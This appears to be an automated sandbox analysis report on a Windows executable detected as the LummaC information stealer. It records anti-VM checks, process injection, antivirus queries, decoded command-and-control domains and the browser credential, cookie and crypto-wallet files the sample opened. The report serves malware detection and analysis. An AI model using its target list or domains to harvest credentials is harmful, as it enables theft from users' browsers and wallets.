5uQssyJU0Hpvnrot4hVHVoUqxHAUKBYcEVuHDVhVr1QGycmyepIn5849VWxAZ4o4yOJt1DFhu71VeFl1vgmdXw3ktwla7uV1OYra4Tp5xlyUq65LJV4q99i2drFBTeEQdHkrVPb6UeQ4PyqsbGnWQNWVigUBesn6oBT7vZo8SdVd4QgNNEU3fAxT8eFytVtxKHN3lBwtomTaTeSMVo
Source: xow.exe, 00000001.00000002.1938561850.00000000008B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: xow.exe, 00000000.00000002.1710337843.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: xow.exe, 00000001.00000002.1938561850.000000000085C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: xow.exe, 00000000.00000002.1731319915.0000000005410000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: hGfsJeE9wc0PNv6cfg3

Source: C:\Users\user\Desktop\xow.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\xow.exe

Code function: 1_2_0039E7A0 LdrInitializeThunk,

1_2_0039E7A0

Source: C:\Users\user\Desktop\xow.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\xow.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\xow.exe

Memory written: C:\Users\user\Desktop\xow.exe base: 360000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: xow.exe, 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: growthselec.bond
Source: xow.exe, 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: immolatechallen.bond
Source: xow.exe, 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: crookedfoshe.bond
Source: xow.exe, 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: strivehelpeu.bond
Source: xow.exe, 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: longingfluffyr.cyou

Source: C:\Users\user\Desktop\xow.exe

Process created: C:\Users\user\Desktop\xow.exe "C:\Users\user\Desktop\xow.exe"

Jump to behavior

Source: C:\Users\user\Desktop\xow.exe	Queries volume information: C:\Users\user\Desktop\xow.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\xow.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: xow.exe, 00000001.00000002.1938561850.000000000088B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\xow.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xow.exe PID: 7392, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\xow.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xow.exe PID: 7392, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 Scheduled Task/Job	111 Process Injection	22 Virtualization/Sandbox Evasion	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
